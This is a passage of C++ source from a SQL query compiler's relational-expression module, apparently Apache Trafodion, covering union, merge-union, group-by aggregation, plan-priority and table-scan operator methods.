resultTable->addColumn(bindWA, *refName, valId); // The variable inside the IF gets the value id of the ValueIdUnion just // generated. ptrLeftVar->setCurrentValueId(valId); // Also update the variable list in the previous IF node if (listOfPreviousIF) { listOfPreviousIF->addToListInIF(leftList->var(), valId); } leftList = leftList->next(); } // while // We now search the right list and do a similar processing for the variables on // the right side that are not on the left rightList = rightList_; while (rightList && (rightList->var())) { foundAMatch = FALSE; NAString const *nameOfRightVar = &(rightList->var()->getName()); AssignmentStHostVars *ptrRightVar = globalList->findVar(*nameOfRightVar); CMPASSERT(ptrRightVar); leftList = leftList_; while (leftList && (leftList->var())) { nameOfLeftVar = &(leftList->var()->getName()); if (*nameOfLeftVar == *nameOfRightVar) { foundAMatch = TRUE; break; } leftList = leftList->next(); } // Create the ValueIdUnion of the two value ids if (!foundAMatch) { ValueId value; ValueIdList list = ptrRightVar->valueIds(); if (list.entries() > 0) { value = ptrRightVar->currentValueId(); } else { // Get a value id for this variable. ItemExpr *expr = ptrRightVar->var()->bindNode(bindWA); value = expr->getValueId(); } ValueIdUnion *vidUnion = new (bindWA->wHeap()) ValueIdUnion(value, rightList->currentValueId(), NULL_VALUE_ID); vidUnion->bindNode(bindWA); if (bindWA->errStatus()) { delete vidUnion; return NULL; } ValueId valId = vidUnion->getValueId(); addValueIdUnion(valId, bindWA->wHeap()); resultTable->addColumn(bindWA, *refName, valId); // The variable inside the IF gets the value id of the ValueIdUnion just // generated. ptrRightVar->setCurrentValueId(valId); // Also update the variable list in the previous IF node if (listOfPreviousIF) { listOfPreviousIF->addToListInIF(rightList->var(), valId); } } // if (!foundAMatch) rightList = rightList->next(); } // while return resultTable; } //++ MV - void Union::addAlternateRightChildOrderExprTree(ItemExpr *alternateRightChildOrderExprTree) { ExprValueId t = alternateRightChildOrderExprTree_; ItemExprTreeAsList(&t, ITM_ITEM_LIST).insert(alternateRightChildOrderExprTree); alternateRightChildOrderExprTree_ = t.getPtr(); } ItemExpr *Union::removeAlternateRightChildOrderExprTree() { ItemExpr *result = alternateRightChildOrderExprTree_; alternateRightChildOrderExprTree_ = NULL; return result; } // MV-- // ----------------------------------------------------------------------- // member functions for class MergeUnion // ----------------------------------------------------------------------- MergeUnion::~MergeUnion() {} NABoolean MergeUnion::isLogical() const { return FALSE; } NABoolean MergeUnion::isPhysical() const { return TRUE; } HashValue MergeUnion::topHash() { HashValue result = Union::topHash(); // result ^= mergeExpr_; return result; } NABoolean MergeUnion::duplicateMatch(const RelExpr & other) const { if (!RelExpr::duplicateMatch(other)) return FALSE; MergeUnion &o = (MergeUnion &) other; // if (mergeExpr_ != o.mergeExpr_) ABORT("duplicateMatch shouldn't be called for physical nodes"); return FALSE; } RelExpr * MergeUnion::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { MergeUnion *result; if (derivedNode == NULL) result = new (outHeap) MergeUnion(NULL, NULL, new (outHeap)UnionMap(*getUnionMap()), getOperatorType(), outHeap); else result = (MergeUnion *) derivedNode; result->mergeExpr_ = mergeExpr_; return Union::copyTopNode(result, outHeap); } void MergeUnion::setSortOrder(const ValueIdList &newSortOrder) { sortOrder_ = newSortOrder; buildMergeExpr(); } void MergeUnion::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (sortOrder_.entries() > 0) { xlist.insert(sortOrder_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("sort_order"); } if (mergeExpr_ != NULL) { xlist.insert(mergeExpr_); llist.insert("merge_expr"); } Union::addLocalExpr(xlist,llist); } void MergeUnion::buildMergeExpr() { // --------------------------------------------------------------------- // build the merge expression (an expression that tells which of the // two input rows, left or right, should be returned next) by creating // an expression "left <= right" from the sort order. // --------------------------------------------------------------------- ItemExpr *leftList = NULL; ItemExpr *rightList = NULL; BiRelat *result = NULL; if (sortOrder_.entries() > 0) { for (Lng32 i = 0; i < (Lng32)sortOrder_.entries(); i++) { ItemExpr *leftItem; ItemExpr *rightItem; leftItem = sortOrder_[i].getItemExpr()-> mapAndRewrite(getLeftMap(),TRUE).getItemExpr(); rightItem = sortOrder_[i].getItemExpr()-> mapAndRewrite(getRightMap(),TRUE).getItemExpr(); // swap left and right if DESC is specified. if(leftItem->getOperatorType() == ITM_INVERSE) { // both streams must be sorted according to the same order. CMPASSERT(rightItem->getOperatorType() == ITM_INVERSE); ItemExpr *temp = leftItem; leftItem = rightItem; rightItem = temp; } // add the newly formed fields of the sort key to the // left and right lists of sort keys if (leftList != NULL) { leftList = new (CmpCommon::statementHeap()) ItemList(leftList,leftItem); rightList = new (CmpCommon::statementHeap()) ItemList(rightList,rightItem); } else { // both left and right list must be NULL leftList = leftItem; rightList = rightItem; } } result = new (CmpCommon::statementHeap()) BiRelat(ITM_LESS_EQ,leftList,rightList); // make the comparison such that NULLs compare greater than instead // of making the expression result NULL result->setSpecialNulls(TRUE); result->synthTypeAndValueId(); } // store the result in the merge expression mergeExpr_ = result; } // ----------------------------------------------------------------------- // member functions for class GroupByAgg // ----------------------------------------------------------------------- GroupByAgg::~GroupByAgg() {} Int32 GroupByAgg::getArity() const { return 1; } void GroupByAgg::pushdownCoveredExpr(const ValueIdSet & outputExpr, const ValueIdSet & newExternalInputs, ValueIdSet & predicatesOnParent, const ValueIdSet * setOfValuesReqdByParent, Lng32 childIndex ) { // --------------------------------------------------------------------- // predicates can only be pushed down if the group by did contain // a group by clause or if this is a scalar groupby for a subquery that // contains null rejecting predicates. If the subquery contains null-rej. // preds then it does not need to do null instantiation for the empty // result set and therefore we do not create a separate VEGRegion for this // subquery. This means that preds can be freely pushed down in this case. // See GroupByAgg::pullUpPreds for a symmetric condition. // --------------------------------------------------------------------- ValueIdSet pushablePredicates; ValueIdSet exprOnParent; ValueIdSet emptySet; if (NOT groupExpr().isEmpty() || containsNullRejectingPredicates()) pushablePredicates = predicatesOnParent; #if 0 else computeValuesReqdForPredicates(predicatesOnParent, exprOnParent); #endif // --------------------------------------------------------------------- // Cause the retrieval of all those values that are needed for // computing the aggregate functions and the group by list. // --------------------------------------------------------------------- getValuesRequiredForEvaluatingAggregate(exprOnParent); exprOnParent += groupExpr(); // --------------------------------------------------------------------- RelExpr::pushdownCoveredExpr(emptySet, newExternalInputs, pushablePredicates, &exprOnParent, childIndex ); // --------------------------------------------------------------------- // Set the value of predicatesOnParent appropriately. // --------------------------------------------------------------------- if (NOT groupExpr().isEmpty() || containsNullRejectingPredicates()) predicatesOnParent.intersectSet(pushablePredicates); } // GroupByAgg::pushdownCoveredExpr void GroupByAgg::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues.clear(); // Assign the grouping expressions and the aggregate functions // that are computed here as the outputs. // outputValues += groupExpr(); outputValues += aggregateExpr(); // If we're enforcing an ITM_ONE_ROW on (x,y), then we can produce not // merely the ITM_ONE_ROW, but also x and y, so add them to our outputs. // For example, if the aggregate is, say, // ITM_ONE_ROW(VEGRef_10(T.A,ixT.A), VEGRef_15(T.B,ixT.B)) // { example query: select * from S where (select A,B from T) < (100,200) } // then add value ids 10 and 11 to our characteristic outputs. // for (ValueId aggid = aggregateExpr().init(); aggregateExpr().next(aggid); aggregateExpr().advance(aggid)) { ItemExpr *aggie = aggid.getItemExpr(); if (aggie->getOperatorType() == ITM_ONE_ROW) { ValueIdSet moreAvailableOutputs; aggie->child(0)->convertToValueIdSet(moreAvailableOutputs, NULL, ITM_ITEM_LIST, FALSE); outputValues += moreAvailableOutputs; } } } // GroupByAgg::getPotentialOutputValues() const NAString GroupByAgg::getText() const { if (NOT groupExpr().isEmpty()) { if (isNotAPartialGroupBy()) return "groupby"; else if (isAPartialGroupByRoot()) return "partial_groupby_root"; else if (isAPartialGroupByNonLeaf()) return "partial_groupby_non_leaf"; else return "partial_groupby_leaf"; } else { if (isNotAPartialGroupBy()) return "scalar_aggr"; else if (isAPartialGroupByRoot()) return "partial_aggr_root"; else if (isAPartialGroupByNonLeaf()) return "partial_aggr_non_leaf"; else return "partial_aggr_leaf"; } } // GroupByAgg::getText() HashValue GroupByAgg::topHash() { HashValue result = RelExpr::topHash(); result ^= groupExpr_; result ^= aggregateExpr_; result ^= (Int32) formEnum_; // MSVC requires cast. return result; } NABoolean GroupByAgg::duplicateMatch(const RelExpr & other) const { if (!RelExpr::duplicateMatch(other)) return FALSE; GroupByAgg &o = (GroupByAgg &) other; if (groupExpr_ != o.groupExpr_ OR aggregateExpr_ != o.aggregateExpr_ OR formEnum_ != o.formEnum_ ) return FALSE; return TRUE; } RelExpr * GroupByAgg::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { GroupByAgg *result; if (derivedNode == NULL) result = new (outHeap) GroupByAgg(NULL, getOperatorType(), NULL, NULL, outHeap); else result = (GroupByAgg *) derivedNode; // copy parse tree nodes (parser only) if (groupExprTree_ != NULL) result->groupExprTree_ = groupExprTree_->copyTree(outHeap); if (aggregateExprTree_ != NULL) result->aggregateExprTree_ = aggregateExprTree_->copyTree(outHeap); result->groupExpr_ = groupExpr_; result->rollupGroupExprList_ = rollupGroupExprList_; result->aggregateExpr_ = aggregateExpr_; result->formEnum_ = formEnum_; result->gbAggPushedBelowTSJ_ = gbAggPushedBelowTSJ_; result->gbAnalysis_ = gbAnalysis_; result->requiresMoveUp_ = requiresMoveUp_ ; result->leftUniqueExpr_ = leftUniqueExpr_; result->containsNullRejectingPredicates_ = containsNullRejectingPredicates_ ; result->parentRootSelectList_ = parentRootSelectList_; result->isMarkedForElimination_ = isMarkedForElimination_; result->selIndexInHaving_ = selIndexInHaving_; result->aggrExprsToBeDeleted_ = aggrExprsToBeDeleted_; result->isRollup_ = isRollup_; result->extraGrpOrderby_= extraGrpOrderby_; result->extraOrderExpr_= extraOrderExpr_; return RelExpr::copyTopNode(result, outHeap); } void GroupByAgg::addGroupExprTree(ItemExpr *groupExpr) { ExprValueId g = groupExprTree_; ItemExprTreeAsList(&g, ITM_ITEM_LIST).insert(groupExpr); groupExprTree_ = g.getPtr(); } ItemExpr * GroupByAgg::removeGroupExprTree() { ItemExpr * result = groupExprTree_; groupExprTree_ = NULL; return result; } void GroupByAgg::addAggregateExprTree(ItemExpr *aggrExpr) { ExprValueId g = groupExprTree_; ItemExprTreeAsList(&g, ITM_ITEM_LIST).insert(aggrExpr); groupExprTree_ = g.getPtr(); } ItemExpr * GroupByAgg::removeAggregateExprTree() { ItemExpr * result = aggregateExprTree_; aggregateExprTree_ = NULL; return result; } void GroupByAgg::getValuesRequiredForEvaluatingAggregate(ValueIdSet& relevantValues) { // Find the values that are needed to evaluate aggregate functions. // NOTE: this should normally just be the direct children of the // aggregate functions. However, some aggregate functions such as // anyTrue sometimes refer to values further down the tree (and // if it's only by using such values as required sort orders). // Handle this special case here (or maybe we should have changed // the anyTrue aggregate function such that it takes separate arguments: // anyTrueGreater(a,b), anyTrueLess(a,b), anyTrueGreaterEq(a,b), ... // for each aggregate expression in the groupby node for (ValueId x = aggregateExpr_.init(); aggregateExpr_.next(x); aggregateExpr_.advance(x)) { Aggregate *agg = (Aggregate *) x.getItemExpr(); Lng32 nc = agg->getArity(); // handle special cases for special aggregate functions switch (agg->getOperatorType()) { case ITM_ANY_TRUE: case ITM_ANY_TRUE_MAX: { ItemExpr *boolInput = agg->child(0); // if the child is a binary comparison operator, then // require both of the children instead of the comparison op. switch (boolInput->getOperatorType()) { case ITM_EQUAL: case ITM_NOT_EQUAL: case ITM_LESS: case ITM_LESS_EQ: case ITM_GREATER: case ITM_GREATER_EQ: relevantValues += boolInput->child(0)->getValueId(); relevantValues += boolInput->child(1)->getValueId(); break; case ITM_VEG_PREDICATE: { VEG * vegPtr = ((VEGPredicate *)boolInput)->getVEG(); relevantValues += vegPtr->getVEGReference()->getValueId(); } break; default: // might not happen right now: an anyTrue with something // other than a binary comparison operator relevantValues += boolInput->getValueId(); break; } } break; case ITM_ONE_ROW: { // collect leaf values into relevant Values ValueIdSet AvailableOutputs_; agg->child(0)->convertToValueIdSet(AvailableOutputs_, NULL, ITM_ITEM_LIST, FALSE); relevantValues += AvailableOutputs_; break; } default: { // all other aggregate functions are handled here // // If we are doing a distinct aggregate we need the // distinct value id. E.g. sum(distinct x*x) with distinct // valueId x, means we eliminate // distinct x's first, then compute sum(x*x) if(agg->isDistinct()) relevantValues += agg->getDistinctValueId(); else relevantValues += agg->child(0)->getValueId(); // for each child of this particular aggregate expression for (Lng32 i = 1; i < nc; i++) { // add the value id of that child to "relevantValues" relevantValues += agg->child(i)->getValueId(); } } break; } } } void GroupByAgg::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (groupExprTree_ != NULL OR NOT groupExpr_.isEmpty()) { if (groupExpr_.isEmpty()) xlist.insert(groupExprTree_); else if (isRollup() && (NOT rollupGroupExprList_.isEmpty())) xlist.insert(rollupGroupExprList_.rebuildExprTree(ITM_ITEM_LIST)); else xlist.insert(groupExpr_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("grouping_columns"); } if (aggregateExprTree_ != NULL OR NOT aggregateExpr_.isEmpty()) { if (aggregateExpr_.isEmpty()) xlist.insert(aggregateExprTree_); else xlist.insert(aggregateExpr_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("aggregates"); } RelExpr::addLocalExpr(xlist,llist); } // ----------------------------------------------------------------------- // Examine the aggregate functions. If any one of them cannot be // evaluated in stages, for example, a partial aggregation followed // by finalization, then do not split this GroupByAgg. // ----------------------------------------------------------------------- NABoolean GroupByAgg::aggregateEvaluationCanBeStaged() const { for (ValueId aggrId = aggregateExpr().init(); aggregateExpr().next(aggrId); aggregateExpr().advance(aggrId)) { CMPASSERT(aggrId.getItemExpr()->isAnAggregate()); if (groupExpr().isEmpty() && (aggrId.getItemExpr()->getOperatorType() == ITM_ONEROW)) return FALSE; if (NOT ((Aggregate *)aggrId.getItemExpr())->evaluationCanBeStaged()) return FALSE; } return TRUE; } // GroupByAgg::aggregateEvaluationCanBeStaged() NABoolean GroupByAgg::executeInDP2() const { CMPASSERT(getPhysicalProperty()); return getPhysicalProperty()->executeInDP2(); } // Try to pull up predicates in preCodeGen, to reduce char. inputs of the // child. Don't actually do this unless "modify" parameter is set to TRUE, // (we want to test this condition in the optimizer for costing). // Return TRUE if we could move some predicates. // Could make this a virtual method on RelExpr if we want to support // this for other operators as well. NABoolean GroupByAgg::tryToPullUpPredicatesInPreCodeGen( const ValueIdSet &valuesAvailableInParent, // pull preds that are covered by these ValueIdSet &pulledPredicates, // return the pulled-up preds ValueIdMap *optionalMap) // optional map to rewrite preds { // other item expressions needed by the child (excluding // selection preds), this is where we make use of the knowledge // that we are dealing with a groupby. ValueIdSet myLocalExpr; ValueIdSet myNewInputs(getGroupAttr()->getCharacteristicInputs()); ValueIdSet mappedValuesAvailableInParent; ValueIdSet tempPulledPreds(selectionPred()); // be optimistic myLocalExpr += child(0).getGroupAttr()->getCharacteristicInputs(); myLocalExpr += groupExpr(); myLocalExpr += aggregateExpr(); // consider only preds that we can evaluate in the parent if (optionalMap) optionalMap->mapValueIdSetDown(valuesAvailableInParent, mappedValuesAvailableInParent); else mappedValuesAvailableInParent = valuesAvailableInParent; tempPulledPreds.removeUnCoveredExprs(mappedValuesAvailableInParent); // add the rest to myLocalExpr myLocalExpr += selectionPred(); myLocalExpr -= tempPulledPreds; // see which of the char. inputs are needed by my local expressions myLocalExpr.weedOutUnreferenced(myNewInputs); // pull up predicates only if that reduces my char. inputs if (NOT (myNewInputs == getGroupAttr()->getCharacteristicInputs())) { ValueIdSet selPredOnlyInputs(getGroupAttr()->getCharacteristicInputs()); // inputs only used by selection predicates selPredOnlyInputs -= myNewInputs; // loop through the selection predicates and pull // those up that reference myNewInputs for (ValueId x=tempPulledPreds.init(); tempPulledPreds.next(x); tempPulledPreds.advance(x)) { if (x.getItemExpr()->referencesOneValueFrom(selPredOnlyInputs)) { // keep this predicate in tempPulledPreds and // remove it from the selection predicates selectionPred() -= x; } else { // this predicate stays on the local node, // remove it from tempPulledPreds tempPulledPreds -= x; } } } else { // no predicates get pulled up tempPulledPreds.clear(); } if (!tempPulledPreds.isEmpty()) { // return pulled predicates if (optionalMap) { ValueIdSet rewrittenPulledPreds; optionalMap->rewriteValueIdSetUp(rewrittenPulledPreds, tempPulledPreds); pulledPredicates += rewrittenPulledPreds; } else pulledPredicates += tempPulledPreds; // adjust char. inputs - this is not exactly // good style, just overwriting the char. inputs, but // hopefully we'll get away with it at this stage in // the processing getGroupAttr()->setCharacteristicInputs(myNewInputs); } // note that we removed these predicates from our node, it's the // caller's responsibility to take them return (NOT tempPulledPreds.isEmpty()); } // ----------------------------------------------------------------------- // member functions for class SortGroupBy // ----------------------------------------------------------------------- SortGroupBy::~SortGroupBy() {} NABoolean SortGroupBy::isLogical() const {return FALSE;} NABoolean SortGroupBy::isPhysical() const {return TRUE;} const NAString SortGroupBy::getText() const { if (isRollup()) return "sort_" + GroupByAgg::getText() + "_rollup"; else return "sort_" + GroupByAgg::getText(); } RelExpr * SortGroupBy::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) result = new (outHeap) SortGroupBy(NULL, getOperatorType(), NULL, NULL, outHeap); else result = derivedNode; return GroupByAgg::copyTopNode(result, outHeap); } PlanPriority ShortCutGroupBy::computeOperatorPriority (const Context* context, PlanWorkSpace *pws, Lng32 planNumber) { // For min(X) or max(X) where X is the first clustering key column, // allow shortcutgroupby plan to compete with other plans based on cost. // Specifically, match the priority of the wave fix so that a // shortcutgroupby plan can cost compete with the parallel // partialgroupby plan. PlanPriority result; if (QueryAnalysis::Instance() && QueryAnalysis::Instance()->dontSurfTheWave()) { // do this only if the wave fix is a competing plan result.incrementLevels(10, 0); } return result; } PlanPriority SortGroupBy::computeOperatorPriority (const Context* context, PlanWorkSpace *pws, Lng32 planNumber) { const PhysicalProperty* spp = context->getPlan()->getPhysicalProperty(); Lng32 degreeOfParallelism = spp->getCountOfPartitions(); double val = 1; if (degreeOfParallelism <= 1) { // serial plans are risky. exact an insurance premium from serial plans. val = CURRSTMT_OPTDEFAULTS->riskPremiumSerial(); // when dontSurfTheWave is ON, // consider serial sort_partial_aggr_nonleaf risky if (QueryAnalysis::Instance() && QueryAnalysis::Instance()->dontSurfTheWave() && isAPartialGroupByNonLeaf() && val <= 1) { val = 1.1; } } CostScalar premium(val); PlanPriority result(0, 0, premium); // WaveFix Begin // This is part of the fix for the count(*) wave // if there is a scalar aggregate query on a single partitioned table, // something like Select count(*) from fact; // In such a case we would like to get a layer of esps, // doing so causes the plan to fixup in parallel avoiding the serial // fixup if the plan is just the master executor on top of dp2. The // serial fixup causes the query to execute in wave pattern, since // each dp2 is fixed up and then starts execution. Due to serial // fixup a dp2 is fixed up, and then we move to the next dp2 causing // the wave pattern. if (QueryAnalysis::Instance() && QueryAnalysis::Instance()->dontSurfTheWave()) { if (isAPartialGroupByLeaf2() && spp->executeInDP2()) result.incrementLevels(10, 0); else if (isAPartialGroupByLeaf1() && (degreeOfParallelism>1) && (!spp->executeInDP2())) result.incrementLevels(5, 0); } // WaveFix End // The remaining part of the code in this function relates to parallelism // priority and not applicable to scalar aggregates if (groupExpr().isEmpty()) return result; if(spp->executeInDP2()) return result; // For the option of Max Degree of Parallelism we can either use the // value set in comp_int_9 (if positive) or we use the number of CPUs // if the CQD is set to -1, or feature is disabled if CQD is 0 (default). Lng32 maxDegree = ActiveSchemaDB()->getDefaults().getAsLong(COMP_INT_9); if (CURRSTMT_OPTDEFAULTS->maxParallelismIsFeasible() OR (maxDegree == -1) ) { // if CQD is set to -1 this mean use the number of CPUs maxDegree = spp->getCurrentCountOfCPUs(); } if (maxDegree > 1) // CQD set to 0 means feature is OFF { if (degreeOfParallelism < maxDegree) result.incrementLevels(0,-10); // need to replace with constant } return result; } // ----------------------------------------------------------------------- // member functions for class ShortCutGroupBy // ----------------------------------------------------------------------- const NAString ShortCutGroupBy::getText() const { return "shortcut_" + GroupByAgg::getText(); } RelExpr * ShortCutGroupBy::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { ShortCutGroupBy *result; if (derivedNode == NULL) // This is the top of the derivation chain // Create an empty ShortCutGroupBy node. // result = new (outHeap) ShortCutGroupBy(NULL, getOperatorType(), NULL, NULL, outHeap); else // A node has already been constructed as a derived class. // result = (ShortCutGroupBy *) derivedNode; // Copy the relevant fields. result->opt_for_max_ = opt_for_max_; result->opt_for_min_ = opt_for_min_; result->isnullable_ = isnullable_; result->lhs_anytrue_ = lhs_anytrue_; result->rhs_anytrue_ = rhs_anytrue_; // Copy any data members from the classes lower in the derivation chain. // return GroupByAgg::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class PhysShortCutGroupBy // ----------------------------------------------------------------------- RelExpr * PhysShortCutGroupBy::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) // This is the top of the derivation chain // Create an empty ShortCutGroupBy node. // result = new (outHeap) PhysShortCutGroupBy(NULL, getOperatorType(), NULL, NULL, outHeap); else // A node has already been constructed as a derived class. // result = (PhysShortCutGroupBy *) derivedNode; // PhysShortCutGroupBy has no data members. // Copy any data members from the classes lower in the derivation chain. // return ShortCutGroupBy::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class HashGroupBy // ----------------------------------------------------------------------- HashGroupBy::~HashGroupBy() {} NABoolean HashGroupBy::isLogical() const {return FALSE;} NABoolean HashGroupBy::isPhysical() const {return TRUE;} const NAString HashGroupBy::getText() const { return "hash_" + GroupByAgg::getText(); } RelExpr * HashGroupBy::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) result = new (outHeap) HashGroupBy(NULL, getOperatorType(), NULL, NULL, outHeap); else result = derivedNode; return GroupByAgg::copyTopNode(result, outHeap); } PlanPriority HashGroupBy::computeOperatorPriority (const Context* context, PlanWorkSpace *pws, Lng32 planNumber) { const PhysicalProperty* spp = context->getPlan()->getPhysicalProperty(); Lng32 degreeOfParallelism = spp->getCountOfPartitions(); double val = 1; if (degreeOfParallelism <= 1) { // Don't command premium for serial hash partial groupby plan if : // 1. Operator is partial group by root // 2. process < 5K rows // This is to prevent optimizer choosing parallel plans for small queries. // The idea is either premium has been already applied for groupby leaf level // or leaf is running in parallel, we don't need to run root also in parallel if ( isAPartialGroupByRoot() && CostScalar((ActiveSchemaDB()->getDefaults()). getAsULong(GROUP_BY_PARTIAL_ROOT_THRESHOLD)) >= this->getChild0Cardinality(context) ) val = 1; else // serial plans are risky. extract an insurance premium from serial plans. val = CURRSTMT_OPTDEFAULTS->riskPremiumSerial(); } CostScalar premium(val); PlanPriority result(0, 0, premium); if (QueryAnalysis::Instance() AND QueryAnalysis::Instance()->optimizeForFirstNRows()) result.incrementLevels(HASH_GROUP_BY_FIRST_N_PRIORITY,0); // The remaining part of the code in this funtion relates to parallelism // priority and not applicable to scalar aggregates if (groupExpr().isEmpty()) return result; // esp parallelism priority logic does not apply to operators in dp2 if(spp->executeInDP2()) return result; // For the option of Max Degree of Parallelism we can either use the // value set in comp_int_9 (if positive) or we use the number of CPUs // if the CQD is set to -1, or feature is disabled if CQD is 0 (default). Lng32 maxDegree = ActiveSchemaDB()->getDefaults().getAsLong(COMP_INT_9); if (CURRSTMT_OPTDEFAULTS->maxParallelismIsFeasible() OR (maxDegree == -1) ) { // if CQD is set to -1 this mean use the number of CPUs maxDegree = spp->getCurrentCountOfCPUs(); } if (maxDegree > 1) // CQD set to 0 means feature is OFF { if (degreeOfParallelism < maxDegree) result.incrementLevels(0,-10); // need to replace with constant } //cout<<maxDegree<<"-------"<<spp->getCountOfPartitions()<<endl; return result; } // ----------------------------------------------------------------------- // member functions for class Scan // ----------------------------------------------------------------------- void Scan::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues.clear(); // // Assign the set of columns that belong to the table to be scanned // as the output values that can be produced by this scan. // if (potentialOutputs_.isEmpty()) { outputValues.insertList( getTableDesc()->getColumnList() ); outputValues.insertList( getTableDesc()->hbaseTSList() ); outputValues.insertList( getTableDesc()->hbaseVersionList() ); } else outputValues = potentialOutputs_; outputValues += getExtraOutputColumns(); } // Scan::getPotentialOutputValues() void Scan::getPotentialOutputValuesAsVEGs(ValueIdSet& outputs) const { outputs.clear(); ValueIdSet tempSet ; getPotentialOutputValues(tempSet); getTableDesc()->getEquivVEGCols(tempSet, outputs); } Int32 Scan::getArity() const { return 0;} NABoolean Scan::isHiveTable() const { return (getTableDesc() && getTableDesc()->getNATable() ? getTableDesc()->getNATable()->isHiveTable() : FALSE); } NABoolean Scan::isHbaseTable() const { return (getTableDesc() && getTableDesc()->getNATable() ? getTableDesc()->getNATable()->isHbaseTable() : FALSE); } NABoolean Scan::isSeabaseTable() const { return (getTableDesc() && getTableDesc()->getNATable() ? getTableDesc()->getNATable()->isSeabaseTable() : FALSE); } const NAString Scan::getText() const { NAString op(CmpCommon::statementHeap()); if (isSampleScan() == TRUE) op = "sample_scan "; else op = "scan "; return op + userTableName_.getTextWithSpecialType(); } HashValue Scan::topHash() { HashValue result = RelExpr::topHash(); result ^= getTableDesc(); result ^= potentialOutputs_; result ^= numIndexJoins_; return result; } NABoolean Scan::duplicateMatch(const RelExpr & other) const { if (NOT RelExpr::duplicateMatch(other)) return FALSE; Scan &o = (Scan &) other; if (NOT (userTableName_ == o.userTableName_) OR NOT (getTableDesc() == o.getTableDesc()) OR NOT (potentialOutputs_ == o.potentialOutputs_) OR ((forcedIndexInfo_ OR o.forcedIndexInfo_) AND ( //just comparing the entries is probably not enough???? NOT (indexOnlyIndexes_.entries() == o.indexOnlyIndexes_.entries()) OR NOT (possibleIndexJoins_ == o.possibleIndexJoins_) OR NOT (numIndexJoins_ == o.numIndexJoins_))) OR NOT (suppressHints_ == o.suppressHints_) OR NOT (isSingleVPScan_ == o.isSingleVPScan_) OR NOT (getExtraOutputColumns() == o.getExtraOutputColumns()) OR NOT (samplePercent() == o.samplePercent()) OR NOT (clusterSize() == o.clusterSize())) return FALSE; return TRUE; } RelExpr * Scan::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Scan *result; if (derivedNode == NULL) result = new (outHeap) Scan(userTableName_, getTableDesc(), REL_SCAN, outHeap); else result = (Scan *) derivedNode; result->baseCardinality_ = baseCardinality_; result->potentialOutputs_ = potentialOutputs_; result->numIndexJoins_ = numIndexJoins_; result->accessOptions_ = accessOptions_; result->pkeyHvarList_ = pkeyHvarList_; result->setOptStoi(stoi_); result->samplePercent(samplePercent()); result->suppressHints_ = suppressHints_; result->clusterSize(clusterSize()); result->scanFlags_ = scanFlags_; result->setExtraOutputColumns(getExtraOutputColumns()); result->isRewrittenMV_ = isRewrittenMV_; result->matchingMVs_ = matchingMVs_; result->hbaseAccessOptions_ = hbaseAccessOptions_; result->commonSubExpr_ = commonSubExpr_; // don't copy values that can be calculated by addIndexInfo() // (some callers will change selection preds, which requires recomputation) return RelExpr::copyTopNode(result, outHeap); } void Scan::copyIndexInfo(RelExpr *derivedNode) { CMPASSERT (derivedNode != NULL AND derivedNode->getOperatorType() == REL_SCAN); Scan * scan = (Scan *)derivedNode; forcedIndexInfo_ = scan->forcedIndexInfo_; if (NOT scan->getIndexOnlyIndexes().isEmpty() OR scan->getPossibleIndexJoins().entries() > 0) { // first copy the possible index join info const LIST(ScanIndexInfo *) & ixJoins = scan->getPossibleIndexJoins(); for (CollIndex i = 0; i < ixJoins.entries(); i++) { ScanIndexInfo * ix = new (CmpCommon::statementHeap()) ScanIndexInfo(*(ixJoins[i])); possibleIndexJoins_.insert(ix); } // now, copy the index descriptors const SET(IndexProperty *) & ixDescs = scan->getIndexOnlyIndexes(); for (CollIndex j = 0; j <ixDescs.entries(); j++) { indexOnlyIndexes_.insert(ixDescs[j]); } } generatedCCPreds_ = scan->generatedCCPreds_; } void Scan::removeIndexInfo() { possibleIndexJoins_.clear(); indexOnlyIndexes_.clear(); indexJoinScans_.clear(); generatedCCPreds_.clear(); forcedIndexInfo_ = FALSE; } /******************************************************* * Generates set of IndexDesc from the set of IndexProperty ********************************************************/ const SET(IndexDesc *) & Scan::deriveIndexOnlyIndexDesc() { indexOnlyScans_.clear(); CollIndex ixCount = indexOnlyIndexes_.entries(); for(CollIndex i=0; i< ixCount; i++) { indexOnlyScans_.insert(indexOnlyIndexes_[i]->getIndexDesc()); } return indexOnlyScans_; } /******************************************************* * Generates set of IndexDesc from the set of ScanIndexInfo ********************************************************/ const SET(IndexDesc *) & Scan::deriveIndexJoinIndexDesc() { indexJoinScans_.clear(); CollIndex ijCount = possibleIndexJoins_.entries(); for(CollIndex i=0; i< ijCount; i++) { ScanIndexInfo *ixi = possibleIndexJoins_[i]; CollIndex uixCount = ixi->usableIndexes_.entries(); for(CollIndex j=0; j < uixCount; j++) { if (ixi->usableIndexes_[j]->getIndexDesc()) indexJoinScans_.insert(ixi->usableIndexes_[j]->getIndexDesc()); } } return indexJoinScans_; } void Scan::addIndexInfo() { // don't do this twice, return if already set if (NOT indexOnlyIndexes_.isEmpty() OR possibleIndexJoins_.entries() > 0) return; forcedIndexInfo_ = FALSE; const TableDesc * tableDesc = getTableDesc(); const LIST(IndexDesc *) & ixlist = tableDesc->getIndexes(); ValueIdSet preds = selectionPred(); // changing back to old predicate tree: if ((CmpCommon::getDefault(RANGESPEC_TRANSFORMATION) == DF_ON ) && (preds.entries())) { ValueIdList selectionPredList(preds); ItemExpr *inputItemExprTree = selectionPredList.rebuildExprTree(ITM_AND,FALSE,FALSE); ItemExpr * resultOld = revertBackToOldTree(CmpCommon::statementHeap(), inputItemExprTree); preds.clear(); resultOld->convertToValueIdSet(preds, NULL, ITM_AND); doNotReplaceAnItemExpressionForLikePredicates(resultOld,preds,resultOld); } if 